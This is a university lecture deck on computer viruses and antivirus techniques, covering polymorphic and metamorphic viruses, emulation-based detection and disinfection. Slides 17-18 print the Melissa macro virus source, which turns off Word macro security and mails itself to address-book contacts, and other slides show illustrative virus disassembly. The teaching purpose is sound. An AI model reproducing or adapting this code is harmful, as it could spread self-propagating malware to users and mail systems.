1. CSE 127 Computer Security Spring 2009 Malware I: Viruses and virus-defense Stefan Savage Many sides courtesy Carey Nachenberg

2. Recap l Various ways to compromise software systems based in input and timing u Buffer overflows, format string errors, TOCTOU, SQL injection, XSS etc… l But once you’ve compromised system, then what does the malicious software do? l First: propagates itself to create an installed base l Today: viruses – the oldest mass malware September 14, 2015

3. Reminder l You have a project due on Tuesday September 14, 20153

4. Viruses l A computer virus is a (malicious) program u Attaches to a host program or data u Creates (possibly modified) copies of itself u Payload of program may have other effects (deleting files, opening backdoors, printing messages, etc) l Viruses traditionally require some user action to activate (i.e. execute some file, open some spreadsheet, etc)

5. September 14, 2015 Virus Writer’s Goals l Hard to detect l Hard to destroy or deactivate l Spreads infection widely/quickly l Can reinfect a host l Easy to create

6. September 14, 2015 Kinds of Viruses l Boot Sector Viruses u Historically important, but less common today l Memory Resident Viruses u Standard infected executable l Macro Viruses u Embedded in documents (like Word docs) l E-mail/IM Viruses u Spread via attachments l Web platform viruses u Spread on Web sites (e.g. social net applications)

7. September 14, 20157 Boot sector Viruses (old school) l Bootstrap Process: u Firmware (ROM) copies MBR (master boot record) to memory, jumps to that program l MBR (or Boot Sector) u Fixed position on disk u “Chained” boot sectors permit longer Bootstrap Loaders MBRboot

8. September 14, 2015 Boot sector Viruses l Virus breaks the chain l Inserts virus code l Reconnects chain afterwards MBRboot virus

9. September 14, 20159 Why attack the Bootstrap? l Automatically executed before OS is running u Any thus, before detection tools are running l OS hides boot sector information from users u Hard to discover that the virus is there u Harder to fix l Any good virus scanning software scans the boot sectors u But good bootsector viruses may restore good bootsector during normal operation (replace it when you logout or when anti-virus software isn’t running) u Bootsector malware is back with a vengeance (Meebroot/Sinowal)

10. September 14, 201510 Virus Attachment to Host Code l Simplest case: insert copy at the beginning of an executable file u Runs before other code of the program u Historically most common program virus l Runs before & after original program u Virus can clean up after itself l Virus could modify code in place u Doesn’t change size, but could change behavior u Maybe harder to detect? Original Program Modified Program

11. September 14, 2015 Other virus tricks l Entry-point obscuring viruses u Virus takes control in middle of program (random code point) and is harder to scan for l Polymorphic viruses u Virus encrypts body with random key in each generation l Metamorphic viruses u Virus rewrites self in each generator (semantically equivalent, but different instruction stream) »Instruction substitution, control flow rewriting, etc

12. September 14, 2015 Other Homes for Viruses l System Software u IO.sys, NTLDR, NTDETECT.COM u autoexec.bat, config.sys, command.com l Memory resident software u Task manager u Window manager u Winamp u RealPlayer u …

13. September 14, 201513 Macro Viruses l Many applications support Macros l Macros are just programs l Word processors & Spreadsheets u Startup macro u Macros turned on by default l Visual Basic Script (VBScript)

14. September 14, 2015 Melissa Macro Virus l Implementation u VBA (Visual Basic for Applications) code associated with the "document.open" method of Word l Strategy u Email message containing an infected Word document as an attachment (social engineering) u Opening Word document triggers virus if macros are enabled u Under certain conditions included attached documents created by the victim

15. September 14, 201515 Melissa Macro Virus: Behavior l Setup u Lowers the macro security settings u Permit all macros to run without warning u Checks registry for key value “… by Kwyjibo” u HKEY_Current_User\Software\Microsoft\Office\Melissa? l Propagation u Sends email message to the first 50 entries in every Microsoft Outlook MAPI address book readable by the user executing the macro

16. September 14, 201516 Melissa Macro Virus: Behavior l Propagation Continued u Infects Normal.doc template file u Normal.doc is used by all Word documents l “Joke” u If minute matches the day of the month, the macro inserts message “Twenty-two points, plus triple- word-score, plus fifty points for using all my letters. Game's over. I'm outta here.”

17. September 14, 201517 // Melissa Virus Source Code Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

18. If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If

19. September 14, 201519 Melissa Virus l Transmission Rate u The first confirmed reports of Melissa were received on Friday, March 26, 1999. u By Monday, March 29, it had reached more than 100,000 computers. u One site got 32,000 infected messages in 45 minutes. l Damage u Denial of service: mail systems off-line. u Could have been much worse l Remedy u Filter mail for virus signature (macro in.doc files) u Don’t run Macros in unknown documents by default u Clean Normal.doc

20. 20 Detecting Viruses l Scanning l Integrity checking l Heuristic detection

21. 21 Virus Signatures l Viruses can’t be completely invisible: u Code must be stored somewhere u Virus must do something when it runs u Idea: look in files for “signature” byte sequences that are unique to the virus l Issues u Where to scan (beginning of file, whole file, registry settings, etc) u How to scan (look for “ILOVEYOU” string, or actually execute program) u How long to scan (tradeoffs in performance/coverage) u How to distinguish polymorphs (research issue)

22. 1. User runs an infected program. 0100 EB1C JMP 011E 0102 BE1B02 MOV SI,021B 0105 BF1B01 MOV DI,011B 0108 8BCE MOV CX,SI 010A F7D9 NEG CX 010C FC CLD 010D B81B01 MOV AX,011B 0110 06 PUSH ES 0111 50 PUSH AX 0112 06 PUSH ES 0113 B81801 MOV AX,0118 0116 50 PUSH AX 0117 CB RETF 0118 F3 REPZ 0119 A4 MOVSB 011A CB RETF 011B E93221 JMP 2250 011E 83C24F ADD DX,+4F 0121 8BFA MOV DI,DX 0123 81FF8000 CMP DI,0080 0127 725E JB 0187 0129 7406 JZ 0131 012B C606250273 MOV BYTE PTR [0225],73 0130 90 NOP 0131 FEC5 INC CH 0133 7303 JNB 0138 0135 80C140 ADD CL,40 0138 B8010C MOV AX,0C01 013B 8BD6 MOV DX,SI 013D CD13 INT 13 Infected Program 2. Program transfers control to the virus. The Simple Virus

23. 3. Virus locates a new program. 0100 EB1C JMP 011E 0102 BE1B02 MOV SI,021B 0105 BF1B01 MOV DI,011B 0108 8BCE MOV CX,SI 010A F7D9 NEG CX 010C FC CLD 010D B81B01 MOV AX,011B 0110 06 PUSH ES 0111 50 PUSH AX 0112 06 PUSH ES 0113 B81801 MOV AX,0118 0116 50 PUSH AX 0117 CB RETF 0118 F3 REPZ 0119 A4 MOVSB 011A CB RETF 011B E93221 JMP 2250 011E 83C24F ADD DX,+4F 0121 8BFA MOV DI,DX 0123 81FF8000 CMP DI,0080 0127 725E JB 0187 0129 7406 JZ 0131 012B C606250273 MOV BYTE PTR [0225],73 0130 90 NOP 0131 FEC5 INC CH 0133 7303 JNB 0138 0135 80C140 ADD CL,40 0138 B8010C MOV AX,0C01 013B 8BD6 MOV DX,SI 013D CD13 INT 13 Infected Program 0100 B435 MOV AH,35 0102 B021 MOV AL,21 0104 CD21 INT 21 0106 8C06A002 MOV [02A0],ES 010A 891E9E02 MOV [029E],BX 010E B425 MOV AH,25 0110 B021 MOV AL,21 0112 BA2001 MOV DX,0120 0115 CD21 INT 21 4. Virus appends its logic to the end of the new file. 0117 83C24F ADD DX,+4F 011A 8BFA MOV DI,DX 011C 81FF8000 CMP DI,0080 0120 725E JB 0187 0122 7406 JZ 0131 0124 C606250273 MOV BYTE PTR [0225],73 0129 90 NOP 012A FEC5 INC CH 012C 7303 JNB 0138 012E 80C140 ADD CL,40 0132 B8010C MOV AX,0C01 0135 8BD6 MOV DX,SI 0137 CD13 INT 13 The Simple Virus

24. 5. Virus updates the new program so the virus gets control when the program is launched. 0100 EB1C JMP 011E 0102 BE1B02 MOV SI,021B 0105 BF1B01 MOV DI,011B 0108 8BCE MOV CX,SI 010A F7D9 NEG CX 010C FC CLD 010D B81B01 MOV AX,011B 0110 06 PUSH ES 0111 50 PUSH AX 0112 06 PUSH ES 0113 B81801 MOV AX,0118 0116 50 PUSH AX 0117 CB RETF 0118 F3 REPZ 0119 A4 MOVSB 011A CB RETF 011B E93221 JMP 2250 011E 83C24F ADD DX,+4F 0121 8BFA MOV DI,DX 0123 81FF8000 CMP DI,0080 0127 725E JB 0187 0129 7406 JZ 0131 012B C606250273 MOV BYTE PTR [0225],73 0130 90 NOP 0131 FEC5 INC CH 0133 7303 JNB 0138 0135 80C140 ADD CL,40 0138 B8010C MOV AX,0C01 013B 8BD6 MOV DX,SI 013D CD13 INT 13 Infected Program 0100 B435 MOV AH,35 0102 B021 MOV AL,21 0104 CD21 INT 21 0106 8C06A002 MOV [02A0],ES 010A 891E9E02 MOV [029E],BX 010E B425 MOV AH,25 0110 B021 MOV AL,21 0112 BA2001 MOV DX,0120 0115 CD21 INT 21 0117 83C24F ADD DX,+4F 011A 8BFA MOV DI,DX 011C 81FF8000 CMP DI,0080 0120 725E JB 0187 0122 7406 JZ 0131 0124 C606250273 MOV BYTE PTR [0225],73 0129 90 NOP 012A FEC5 INC CH 012C 7303 JNB 0138 012E 80C140 ADD CL,40 0132 B8010C MOV AX,0C01 0135 8BD6 MOV DX,SI 0137 CD13 INT 13 0100 EB1C JMP 0117 The Simple Virus

25. 25 Head/Tail Scanners Most of these application-infecting viruses attached themselves to either the top or bottom of the host file: Host Virus Host Virus So anti-virus engineers built head/tail scanners. The scanner loads the head and tail regions of the file into a buffer and then scans with a multi-string search algorithm.

26. 26 So what do the bad guys do? l Move the virus to the middle of the file l Becomes prohibitively expensive to scan u Must scan whole file l Solution: scalpel scanning u Idea: limit scanning to likely entry-points for viruses u If you have more time you can also scan for more than just strings (regular expressions)

27. 27 0100 EB04 JMP 106 0102 B021 MOV AL,21 0104 CD21 INT 21 0106 EB09 JMP 112 0108 B404 MOV AH, 04 010A 891E9E02 MOV [029E],BX 010E B425 MOV AH,25 0110 B021 MOV AL,21 0112 E90200 JMP 117 0115 CD21 INT 21 0117 83C24F ADD DX,+4F 011A 8BFA MOV DI,DX 011C 81FF8000 CMP DI,0080 0120 725E JB 0187 0122 7406 JZ 0131 0124 C606250273 MOV BYTE PTR [0225],73 0129 90 NOP 012A FEC5 INC CH 012C 7303 JNB 0138 012E 80C140 ADD CL,40 0132 B8010C MOV AX,0C01 0135 8BD6 MOV DX,SI 0137 CD13 INT 13 Scalpel Scanning JMP 1.Locate the main program entry-point. 2.While the current instruction is a JUMP or a CALL instruction, trace it. 3.If the current instruction is not a JUMP or CALL instruction, search for all fingerprints in this region of the file. JMP ADD

28. 28 The Encrypted Virus HOST KEY1 Wjsvt Decrypt HOST KEY2 Uhqtr Decrypt Soon after the first generation of executable viruses, virus authors began writing self-encrypting strains. These viruses carry a small decryption loop that runs first, decrypts the virus body and then launches the virus. Each time the virus infects a new file, it changes the encryption key so the virus body looks different.

29. 29 1.MOV DI, 120h 2.MOV AX, [DI] 3.XOR AX, 5132h 4.MOV [DI], AX 5.ADD DI, 2h 6.CMP DI, 2500h 7.JNE 3 8. WJSVTPBMZPL 9. NAADJGNANW... Still easy to detect because the decryption loop stays the same. The Encrypted Virus The decryption routine stays the same. Only the key(s) change. 1.MOV DI, 120h 2.MOV AX, [DI] 3.XOR AX, 0030h 4.MOV [DI], AX 5.ADD DI, 2h 6.CMP DI, 2500h 7.JNE 3 8. PKEPAJHENZAW 9. MNANTPOOTIZN... The encrypted body changes.

30. 30 The Polymorphic Virus l Polymorphic viruses are self-encrypting viruses with a changing decryption algorithm l When infecting a new file, such a virus: u Generates brand-new decryption code from scratch u Encrypts a copy of itself using a complementary encryption algorithm u Inserts both the new decryption code and the encrypted body of the virus into target file

31. 31 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop 1. User Executes Program Virus Mutation Engine Virus Mutation Engine Decryption Loop The Polymorphic Virus

32. 32 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop 1. User Executes Program 2. Virus Decrypts Itself Virus Mutation Engine Virus Mutation Engine Decryption Loop The Polymorphic Virus

33. 33 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop 1. User Executes Program 2. Virus Decrypts Itself Virus Mutation Engine Virus Mutation Engine Decryption Loop The Polymorphic Virus

34. 34 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop 1. User Executes Program 2. Virus Decrypts Itself Virus Mutation Engine Virus Mutation Engine Decryption Loop The Polymorphic Virus

35. 35 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop 3. Virus finds new prog. Virus Mutation Engine Virus Mutation Engine Decryption Loop Host Program (New) The Polymorphic Virus

36. 36 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop Virus Mutation Engine Virus Mutation Engine Decryption Loop Host Program (New) 4. Mutation engine creates new decryptor. Decryption Loop’ 3. Virus finds new prog. The Polymorphic Virus

37. 37 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop Virus Mutation Engine Virus Mutation Engine Decryption Loop Decryption Loop’ Host Program (New) 5. Virus makes a new copy of itself and encrypts this copy. Virus Mutation Engine The Polymorphic Virus

38. 38 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop Virus Mutation Engine Virus Mutation Engine Decryption Loop Decryption Loop’ Host Program (New) 5. Virus makes a new copy of itself and encrypts this copy. Virus Mutation Engine The Polymorphic Virus

39. 39 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop Virus Mutation Engine Virus Mutation Engine Decryption Loop Decryption Loop’ Host Program (New) 5. Virus makes a new copy of itself and encrypts this copy. Virus Mutation Engine The Polymorphic Virus

40. 40 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop Virus Mutation Engine Virus Mutation Engine Decryption Loop Decryption Loop’ Host Program (New) 5. Virus makes a new copy of itself and encrypts this copy. Virus Mutation Engine The Polymorphic Virus

41. 41 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop Virus Mutation Engine Virus Mutation Engine Decryption Loop Decryption Loop’ Host Program (New) Virus Mutation Engine 6. Virus appends the new decryptor and encrypted virus body to new file. The Polymorphic Virus

42. 42 Virus Mutation Engine Virus Mutation Engine Host Program RAM Decryption Loop Virus Mutation Engine Virus Mutation Engine Decryption Loop Decryption Loop’ Host Program (New) Virus Mutation Engine Decryption Loop’ Virus Mutation Engine The Polymorphic Virus

43. 43 RAM Virus Mutation Engine Virus Mutation Engine Decryption Loop Decryption Loop’ Host Program (New) Virus Mutation Engine Decryption Loop’ Virus Mutation Engine And we have a new infection! The Polymorphic Virus

44. 44 The Polymorphic Virus Addr Machine Code Mnemonic 0100 50 PUSH AX 0101 B8347E MOV AX,7E34 0104 25A907 AND AX,07A9 0107 95 XCHG BP,AX 0108 B840B2 MOV AX,B240 010B BABBB8 MOV DX,B8BB 010E F7EA IMUL DX 0110 93 XCHG BX,AX 0111 B8B4D2 MOV AX,D2B4 0114 03C3 ADD AX,BX 0116 2BC5 SUB AX,BP 0118 BA479A MOV DX,9A47 011B F7E2 MUL DX 011D 95 XCHG BP,AX 011E B809F4 MOV AX,F409 0121 2BC5 SUB AX,BP 0123 91 XCHG CX,AX 0124 B8AB6A MOV AX,6AAB 0127 BA972C MOV DX,2C97 012A F7E2 MUL DX 012C D1C0 ROL AX,1 012E 80E11F AND CL,1F 0131 D3E0 SHL AX,CL 0133 91 XCHG CX,AX 0134 B8E1CE MOV AX,CEE1 0137 03C1 ADD AX,CX 0139 93 XCHG BX,AX 013A B84A43 MOV AX,434A 013D 29C3 SUB BX,AX 013F F7DB NEG BX 0141 8B86381B MOV AX,[BP+1B38] 0145 8ACB MOV CL,BL 0147 D3C8 ROR AX,CL 0149 2D23C9 SUB AX,C923 014C B108 MOV CL,08 014E D3C8 ROR AX,CL 0150 8786381B XCHG AX,[BP+1B38] 0154 B80765 MOV AX,6507 0157 BA55B3 MOV DX,B355 015A F7E2 MUL DX 015C 96 XCHG SI,AX 015D 8BC5 MOV AX,BP 015F 2BC6 SUB AX,SI 0161 BAE337 MOV DX,37E3 0164 F7E2 MUL DX 0166 96 XCHG SI,AX 0167 B80765 MOV AX,6507 016A BA55B3 MOV DX,B355 016D F7E2 MUL DX 016F 91 XCHG CX,AX 0170 8BC6 MOV AX,SI 0172 BACBC5 MOV DX,C5CB 0175 F7E2 MUL DX 0177 03C1 ADD AX,CX 0179 95 XCHG BP,AX 017A 45 INC BP 017B 45 INC BP 017C 75A0 JNZ 011E Addr Machine Code Mnemonic 0200 BE36F2 MOV SI,F236 0203 8BFE MOV DI,SI 0205 B807D7 MOV AX,D707 0208 33C7 XOR AX,DI 020A 95 XCHG BP,AX 020B B858AC MOV AX,AC58 020E F7ED IMUL BP 0210 2560B1 AND AX,B160 0213 95 XCHG BP,AX 0214 B8C0EA MOV AX,EAC0 0217 8BCD MOV CX,BP 0219 80E11F AND CL,1F 021C D3E8 SHR AX,CL 021E 85C0 TEST AX,AX 0220 7503 JNZ 0225 0222 FB STI 0223 F1 DB F1 0224 AB STOSW 0225 91 XCHG CX,AX 0226 36 SS: 0227 8B852310 MOV AX,[DI+1023] 022B D3C0 ROL AX,CL 022D BA4FB9 MOV DX,B94F 0230 F7E2 MUL DX 0232 36 SS: 0233 89852310 MOV [DI+1023],AX 0237 8BEF MOV BP,DI 0239 8BFD MOV DI,BP 023B 47 INC DI 023C 47 INC DI 023D 75C6 JNZ 0205 Here we have a decryption loop from an MtE-based virus infection. And here’s a second generation decryption loop of the same virus strain.

45. 45 Detecting The Polymorphic Virus So how do we detect such a beast? B98104%F%1BD????%FBE????%F%53142??%F??C0%F45%F??CC%FE2 B98104%8BB????%FBE????%F%53140??%F??C0%F43%F??CC%FE2 B98104%F%5BE????%F%53144??%F??C0%F46%F??CC%FE2 B98104%F%9BF????%F%53145??%F??C0%F47%F??CC%FE2 B98104%F%1BD????%FBF????%F%53143??%F??C0%F47%F??CC%FE2 B98104%8BB????%F%1BF????%F%53141??%F??C0%F47%F??CC%FE2 The number of strings (alg. sigs) explodes quickly! Detecting the decryption loop is prone to false positives! 1. Use lots of wildcard strings strings/scripts: 2. X-ray techniques (plaintext attack on encrypted virus body)

46. 46 Assume the file is infected and perform a plain-text attack of the encrypted virus code. This only works for simple schemes (but its often sufficient). Scanned file: 60 5C 5D 47 14 5D 47 14-55 14 40 51 47 40 54 68 69 73 20 69 73 20-61 20 74 65 73 74 Virus plain-text: + 34 + + + The key must be 34! The scheme must be XOR! X-ray scanning Host Program 7 bytes from EOF = “VIRUS”? AMBCAPQYEQYQ WERQWERQWER ERGQWETWLRW

47. 47 “Generic” Decryption l Invented by Alan Solomon (a.k.a. Dr. Solomon) u Chose name to obscure how it worked l Assumptions u Virus gains control of the host immediately u Virus decrypts itself deterministically u Virus has a some static body that can be detected with traditional signatures l Key idea: u Emulate code execution until the virus decrypts itself »Typically use some sort of virtual machine (VM) environment u Search for signatures in memory

48. 48 Simulated OS and other data structures Virus Mutation Engine Virus Mutation Engine Host Program Decryption Loop Virtual Machine 1. Load suspected program into VM. Host Program Decryption Loop Mutation Engine Virus 2. Allow the program to execute normally. Modified Memory Program Off Disk Generic Decryption

49. 49 Simulated OS and other data structures Generic Decryption Virtual Machine 1. Load suspected program into VM. Host Program Decryption Loop Mutation Engine Virus 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Modified Memory 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1

50. 50 Virtual Machine Modified Memory 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Simulated OS and other data structures Generic Decryption 1. Load suspected program into VM. Host Program Decryption Loop Mutation Engine Virus 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1

51. 51 2. Allow the program to execute normally. Simulated OS and other data structures Generic Decryption Virtual Machine 1. Load suspected program into VM. Host Program Decryption Loop Mutation Engine Virus 3. “Tag” all modified memory as the program executes. Modified Memory 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1

52. 52 Simulated OS and other data structures Generic Decryption Virtual Machine 1. Load suspected program into VM. Host Program Decryption Loop Mutation Engine Virus 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Modified Memory 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 x

53. 53 Simulated OS and other data structures Generic Decryption Virtual Machine 1. Load suspected program into VM. Host Program Decryption Loop Mutation Engine Virus 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Modified Memory 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 x And on it goes...

54. 54 2. Allow the program to execute normally. Simulated OS and other data structures Generic Decryption Virtual Machine 1. Load suspected program into VM. Host Program Decryption Loop Mutation Engine Virus 3. “Tag” all modified memory as the program executes. Modified Memory 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 x And on it goes... x

55. 55 Simulated OS and other data structures Generic Decryption Virtual Machine 1. Load suspected program into VM. Host Program Decryption Loop Mutation Engine Virus 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Modified Memory 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 x And on it goes... x x

56. 56 Simulated OS and other data structures Generic Decryption Virtual Machine 1. Load suspected program into VM. Host Program Decryption Loop Mutation Engine Virus 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Modified Memory 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 x And on it goes... x x x

57. 57 Simulated OS and other data structures Generic Decryption Virtual Machine 1. Load suspected program into VM. Host Program Decryption Loop Mutation Engine Virus 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Modified Memory 1. Fetch Byte 2. Decrypt Byte 3. Store Byte 4. Loop to 1 x And on it goes... x x x 4. Scan all modified areas of virtual memory for virus signatures.

58. 58 Simulated OS and other data structures Generic Decryption Virtual Machine 4. Scan all modified areas of virtual memory for virus signatures. Host Program Decryption Loop Mutation Engine Virus 1. Load suspected program into VM. 2. Allow the program to execute normally. 3. “Tag” all modified memory as the program executes. Modified Memory x x x x KILL KILL KILL

59. 59 Challenges with GD l How long to emulate program? u Emulate too long and the system slows to a crawl u Don’t emulate enough and you might miss the virus l Two approaches u Heuristic-driven emulation »Emulate while you see “suspicious” behavior n Unusual instruction sequences, sequence modifications of memory, etc »Suffers from false positives and false negatives & can be avoided »Prolong execution on uninfected files u Profile driven emulation

60. 60 Profile-based Emulation For each new polymorphic virus strain, engineers identify its key characteristics and then add this profile to the anti-virus data files. Fetch and emulate instructions from a program file as long as its instructions are consistent with at least one polymorphic virus profile. When all viruses have been eliminated from consideration, cease emulation.

61. 61 DSCE 1001000000.. MtE 0111000001.. SMEG 0001000111.. ADD opcode SUB opcode XOR opcode INC opcode MOV opcode ROL opcode INT opcode DEC opcodeNOP opcode JMP opcode... 0100 JMP 117 0102 MOV AL,21 0104 INT 21 0106 MOV [02A0],ES 010A MOV [029E],BX 010E MOV AH,25 0110 MOV AL,21 0112 MOV DX,0120 0115 INT 21 0117 ADD DX,+4F 011A MOV DI,DX 011C CMP DI,0080 0120 JB 0187 0122 JZ 0131 0124 MOV BYTE PTR [0225],73 0129 NOP Profile-based Emulation

62. 62 DSCE 1001000000.. MtE 0111000001.. SMEG 1001000111.. ADD opcode SUB opcode XOR opcode INC opcode MOV opcode ROL opcode INT opcode DEC opcodeNOP opcode JMP opcode... 0100 JMP 117 0102 MOV AL,21 0104 INT 21 0106 MOV [02A0],ES 010A MOV [029E],BX 010E MOV AH,25 0110 MOV AL,21 0112 MOV DX,0120 0115 INT 21 0117 ADD DX,+4F 011A MOV DI,DX 011C CMP DI,0080 0120 JB 0187 0122 JZ 0131 0124 MOV BYTE PTR [0225],73 0129 NOP Profile-based Emulation

63. 63 DSCE 1001000000.. MtE 0111000001.. SMEG 1001100111.. ADD opcode SUB opcode XOR opcode INC opcode MOV opcode ROL opcode INT opcode DEC opcodeNOP opcode JMP opcode... 0100 JMP 117 0102 MOV AL,21 0104 INT 21 0106 MOV [02A0],ES 010A MOV [029E],BX 010E MOV AH,25 0110 MOV AL,21 0112 MOV DX,0120 0115 INT 21 0117 ADD DX,+4F 011A MOV DI,DX 011C CMP DI,0080 0120 JB 0187 0122 JZ 0131 0124 MOV BYTE PTR [0225],73 0129 NOP Profile-based Emulation

64. 64 DSCE 1001000000.. MtE 0111000001.. SMEG 1001100111.. ADD opcode SUB opcode XOR opcode INC opcode MOV opcode ROL opcode INT opcode DEC opcodeNOP opcode JMP opcode... 0100 JMP 117 0102 MOV AL,21 0104 INT 21 0106 MOV [02A0],ES 010A MOV [029E],BX 010E MOV AH,25 0110 MOV AL,21 0112 MOV DX,0120 0115 INT 21 0117 ADD DX,+4F 011A MOV DI,DX 011C CMP DI,0080 0120 JB 0187 0122 JZ 0131 0124 MOV BYTE PTR [0225],73 0129 NOP Profile-based Emulation and so on...

65. 65 Profile-based Emulation Poly #1a Poly #1b Poly #3 Poly #4 Poly #2 Poly #5 Poly #3b The profiles are specific to each polymorphic virus, limiting the search space. This reduces the number of iterations required on uninfected files. Clean File Clean File Clean File

66. 66 Problems l Time consuming to generate profiles u And if you get one wrong you can miss stuff l Lots of ways to get around GD u Random viruses »V will only run if the time is between 3 and 4pm u Emulator-aware viruses »V detects its in an emulator and hides u Maxed-out iteration viruses »V takes too long to emulate u Entry-point Obscuring Viruses

67. 67 Entry-point Obscuring Viruses These viruses do not gain control at the main program entry-point. Instead, they modify the host program to transfer control to the virus at some obfuscated point in the program. MZ PE Section #1 Info Section #2 Info Section #3 Info Section #4 Info code code code code code cod data data data data data data d.reloc.reloc.reloc.reloc.relo Decrypt virus virus virus vi virus virus virus virus virus vi JMP

68. 68 What to do… l Tailored code written to detect each strain of virus (knowledgeable about EPO approach) l Typically low-level pseudo-code which evaluates program and can invoke emulator when necessary l Fast to execute but can be time-consuming to write l But it gets worse… u Metamorphic viruses u Integrated infection

69. 69 The Metamorphic Virus These viruses rewrite their logic in each new infection! They have no byte-level fingerprint anywhere! Metamorphic strains use the current infection’s code as a template and then expand and contract sets of instructions within the body to create a child infection. Problems: 1.Huge analysis time for researchers 2.Researchers forced to write new hand-coded detections for each new strain 3.Scanner performance potentially degrades linearly with each new metamorphic detection

70. 70 Rather than appending a single large chunk of code to target files, integrated infectors disassemble their host, integrate their logic throughout the original logic, and reassemble. Problem: There is no big chunk of code to identify and scan. Disinfection is a nightmare. Integrated infection

71. 71 Summary: Modern AV programs l Its not grep l Carefully constructed dictionary of known virus signatures u Complex algorithmic signatures, not just strings l Whole system emulator executes programs in sandbox, scanning for signatures during execution u Heuristics to determine how long to emulate, when to emulate etc…. u Lots of tricks for speed

72. 72 Virus Scanning: Pros & Cons l Pros u Effectively detects known viruses before they can cause harm u Few false alarms l Cons u Can detect only viruses with known signatures »Assumption is that samples can be obtained u Signature set must be kept up to date »Can take 5mins to identify simple signature, days for complex one u Signature set must be distributed to all clients »Symantec pushes 1.4B updates per day (~60TB) u Virus writers can easily change virus signatures »Packers… u Fundamentally a reactive business

73. 73 Innoculation l Most viruses use so kind of marker to identify infected files l Innoculation: add the marker to clean files so they won’t be infected l Drawbacks: u Markerless or implicit marker viruses (e.g. file size, checksum) u Lots of different markers for different viruses; need to change all files

74. 74 Integrity Checks & whitelists l Virus scanner computes hash or checksum of executable files (or downloads hash of “known good” files) u Assumed to be virus free! u Stores the hash information l Verifies new hash vs. saved one during scan

75. 75 Integrity Checks: Pros & Cons l Pros u Can detect corruption of executables too u Reliable u Doesn’t require virus signatures l Cons u False positives (i.e. recompilation, updates) u Can’t use it on documents (they change too often)

76. 76 Behavior-based Detection l Collection of ad hoc rules that identifies virus behavior or virus-like programs u Unusual system call behavior »E.g. if you try to transmit a buffer that contains the contents of a stack buffer you received from the network »Uncommon syscall/argument patterns from each codepoint u Modification of system executables/templates »normal.doc u Self-modifying and self-referential code u Rarely use instructions or lots of NOPs l This is where the action was until very recently

77. 77 Behavior-based detection: Pros & Cons l Pros u Perhaps able to detect unknown viruses l Cons u Good heuristics are hard to develop u Bad heuristics have too many false positives l All major AV programs have moved to incorporate behavioral techniques

78. 78 Disinfection l Ok, you found a virus in a file… now what? l Standard disinfection u Virus saves the beginning of the file it overwrites (for control transfer) so it can correctly execute it later u To clean: find virus, find original host file beginning, find size of virus. Now move original code to beginning, and truncate file to eliminate virus code u Specialized to each virus l Generic disinfection u Run program and emulate until it restores the file to its normal state (so it can execute normally); let the virus itself do the tough work u Rewrite cleaned program back to disk u Works with roughly covers 70% of viruses u Problems: viruses that overwrite code, viruses with unknown entry points, viruses not well modeled by heuristics – when is image clean?)

79. 79 Next time… l Next time: Worms (and maybe bots)